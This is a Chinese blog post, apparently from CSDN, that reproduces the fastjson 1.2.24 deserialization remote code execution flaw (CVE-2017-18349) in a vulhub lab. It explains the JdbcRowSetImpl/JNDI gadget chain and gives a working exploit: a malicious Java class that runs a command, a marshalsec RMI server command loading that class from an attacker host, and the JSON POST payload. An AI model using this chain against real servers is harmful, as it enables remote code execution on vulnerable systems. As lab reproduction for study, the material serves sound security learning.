fastjson1.2.24反序列化漏洞复现 CVE-2017-18349

已于 2024-09-10 20:42:51 修改
阅读量1.2k 收藏 22
点赞数 28
分类专栏: 漏洞复现 文章标签: json web安全
于 2024-09-10 15:45:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62284238/article/details/142094093
版权

1.准备:

1.1复现环境

漏洞环境:vulnhub靶场

工具准备:jdk8,apache-maven-3.9.9,kali2024.1,MarshalSec

1.2环境启动

进入vulnhub目录下的fastjson目录,进入CVE-2017-18349目录

cd /home/hbesljx/vulhub/fastjson/1.2.24-rce

docker-compoe启动漏洞环境

docker-compose up -d

访问靶机的8090端口。出现如下即为开启成功!

2.概念说明

2.1 fastjson是什么

Fastjson 是阿里巴巴开源的一个 Java 库,主要用于将 Java 对象转换成 JSON 格式的字符串,以及将 JSON 字符串转换回 Java 对象。

2.2 JNDI是什么

JNDI是JAVA应用程序接口,为JAVA应用程序提供命名服务,提供了查找和访问各种命名和目录服务的通用统一接口。

通俗来说,JNDI给各个资源进行命名,然后我们需要这个资源的时候,只需要告诉JNDI这个资源的名字,它就会去找到这个资源并且返回给我们。有效实现了程序和资源的解耦合。

2.3 RMI是什么

JAVA远程方法调用(RMI)允许在一个Java虚拟机中运行的对象调用在另一个Java虚拟机中运行的对象的方法。RMI提供了用JAVA编程语言编写的程序之间的远程通信。

3.漏洞原理

fastjson在解析json的过程中,支持使用@type来实例化某一个具体的类,并调用该类的set/get方法来访问属性。这个@type是我们可控的参数值。

因此我们选择@type为"com.sun.rowset.JdbcRowSetImpl",在反序列化时会调用这个类的set/get方法。

而我们传入了dataSourceName和autoCommit两个值,因此会调用对象的setDataSourceName()和setAutoCommit()方法。

而在是setAutoCommit()中有一行代码
 

this.conn = this.connect();

意味着setAutoCommit()会调用connect方法。

而在connect()方法中我们可以看见这样一行代码

DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());

说明connect()方法调用了lookup方法,参数为我们的dataSourceName。

lookup()方法是JNDI的一种实现,我们只需要让dataSourceName指向我们构造的恶意对象即可。

利用RMI让dataSourceName可以访问到我们的恶意对象。

4.漏洞复现

4.1 编译恶意java对象

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

javac TouchFile.java

得到class文件

4.2 kali下载jdk8和apache-maven-3.9.9并且安装

4.3 marshalsec搭建RMI服务器

4.3.1 下载marshalsec

marshalsec下载地址

进入marshalsec-master目录

打开maven

执行mvn clean package -DskipTests

cd marshalsec
source /etc/profile
mvn clean package -DskipTests

如果报错网络无法连接,打开maven目录的/conf/settings.xml文件,添加阿里云镜像

<mirrors>
    <mirror>
        <id>alimaven</id>
        <name>aliyun maven</name>
        <url>http://maven.aliyun.com/nexus/content/repositories/central/</url>
        <mirrorOf>central</mirrorOf>
    </mirror>
 </mirrors>

 4.3.2 启动RMI服务器,加载放在kali的远程恶意class

保证java和javac版本一致!

切换java和javac版本命令如下:

sudo update-alternatives --config java
sudo update-alternatives --config javac

首先将构造的TouchFile.class放到kali的apache网站目录下

借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类`TouchFile.class`:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.133.130/#TouchFile" 9999

4.4 向靶场服务器发送Payload

payload如下

POST / HTTP/1.1
Host: 192.168.133.140:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.133.130:9999/TouchFile",
        "autoCommit":true
    }
}

其中就构造了@type使得反序列化调用JdbcRowSetImpl的set方法,从而调用到connect()中的lookup()方法,读取到我们传入的dataSourceName,通过RMI调用到我们构造的远程恶意class。

4.5 检查是否执行了命令

进入靶场目录检查是否执行了"touch /tmp/success"命令

首先查看我们的CONTAINER ID

docker ps

然后进入/tmp目录查看是否有success文件 

docker exec -it your_container_ID bash
cd tmp/
ls

执行成功!

唔熙迪熙
关注
  • 28
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】5. Fastjson 1.2.24反序列化漏洞CVE-2017-18349复现
Zichel77的博客
03-21 1593
FastJson 库是 Java 的一个 Json 库,其作用是将 Java 对象转换成 json 数据来表示,也可以将 json 数据转换成 Java 对象,使用非常方便,号称是执行速度最快的库。在 1.2.24 版本的 Fastjson 出现了一个反序列化漏洞fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
反序列化FastJson1.2.24 反序列化漏洞解析(CVE-2017-18349
Continuejww的博客
09-17 340
基于Vulhub平台完整复现+CVE-2017-18349复现+注意事项。
Fastjson 反序列化漏洞(CVE-2017-18349)
qq_68163788的博客
06-19 995
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson1.2.24 反序列化漏洞(CVE-2017-18349)分析
st3pby的博客
12-19 1600
FastJson在<=1.2.24@typesetget这里分析利用链。
Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1633
Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现
fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)
一个top2本科学渣的救赎之路
04-23 6412
fastjson 1.2.24 反序列化导致任意命令执行漏洞,可获得服务器root权限
【vulhub漏洞复现Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现
一剑开天门!的博客
02-16 1446
【vulhub漏洞复现Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349
00勇士王子的博客
03-22 5752
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
FastJson1.2.24反序列化导致任意命令执行漏洞复现CVE-2017-18349
又菜又爱倒腾的博客
10-29 2377
#FastJson1.2.24反序列化导致任意命令执行漏洞CVE-2017-18349)# 一、漏洞简介 Pippo是一款基于Java的Web框架。FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全安全
[渗透测试笔记] 48.Fastjson1.2.24反序列化漏洞复现(CVE-2017-18349)
H4ppyD0g的博客
03-16 2454
文章目录漏洞描述影响范围漏洞复现 漏洞描述 FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCod
JAVA反序列化漏洞复现
墨鱼菜鸡
05-31 250
目录 Weblogic反序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) Weblogic反序列...
fastjson-cnvd-2017-02833漏洞复现 | Web漏洞挖掘班作业
Ms08067安全实验室
12-08 849
文章来源|MS08067 Web安全漏洞挖掘实战班课后作业本文作者:某学员A(Web漏洞挖掘实战班2期学员)一、漏洞概述fastjson在解析json的过程中,支持使用@type字段来指定...
Fastjson 反序列化漏洞
晓得哥的博客
05-13 2154
作者:Longofo@知道创宇404实验室 时间:2020年4月27日 英文版本:https://paper.seebug.org/1193/ 原文地址:https://paper.seebug.org/1192/ Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce pa
fastjson safemode_Fastjson 反序列化漏洞
weixin_33476081的博客
02-06 1421
作者:Longofo@知道创宇404实验室时间:2020年4月27日英文版本:https://paper.seebug.org/1193/Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一...
Save OpenAI response in Azure function to Blob storage
suiusoar
09-06 1236
将 OpenAI 的响应保存在 Azure 函数中到 Blob 存储
微信小程序npm扩展能力探究
曹定栓的博客
09-04 1382
小程序支持使用 npm 安装第三方包。
JavaScript前端面试题——深拷贝及浅拷贝
lbcbjtlhmjq的博客
09-05 854
深拷贝和浅拷贝是复制数据结构的两种不同方式。浅拷贝是指创建一个新对象,但仅复制原对象的属性引用,而不是其属性值。即,如果原对象的属性值是对象或数组,浅拷贝后的新对象会引用相同的内存地址,因此修改内层对象会影响到原对象。(简单数据类型拷贝值,引用数据类型拷贝地址)深拷贝是创建一个新的对象,并复制原始对象的所有属性,包括嵌套的对象和数组。这意味着在原始对象或新对象上的更改不会相互影响。
深入解析Go语言中的条件控制与数据处理
最新发布
一个被知识诅咒的人
09-08 1089
本文详细介绍了Go语言中的switch语句及其在正则表达式匹配中的应用,探讨了如何通过math/big包进行高精度圆周率计算。此外,文章还展示了如何实现一个简易键值对存储系统,并通过encoding/json和encoding/xml包处理常见的JSON和XML数据格式。通过这些示例和知识点,读者将能掌握Go语言中条件控制和数据处理的高级应用,提升编写高效代码的能力。
fastjson反序列化漏洞复现过程
04-19
根据提供的引用内容,fastjson反序列化漏洞是一种安全漏洞,攻击者可以利用该漏洞在目标系统上执行恶意代码。下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入语句来确定。 2. 漏洞复现:根据Fastjson的版本号选择相应的漏洞复现方法。 - Fastjson<1.2.24远程代码执行(CNVD-2017-02833):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中插入恶意的Java代码,并通过反序列化操作执行该代码。 - Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止fastjson反序列化漏洞的利用,可以采取以下措施: - 及时升级Fastjson版本:Fastjson团队会及时修复漏洞并发布新版本,及时升级到最新版本可以避免被已知漏洞攻击。 - 输入验证和过滤:在接收用户输入并进行反序列化操作之前,对输入进行严格的验证和过滤,确保输入的数据符合预期的格式和内容。 - 使用安全JSON库:考虑使用其他安全性更高的JSON库,如Jackson或Gson,来替代Fastjson
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值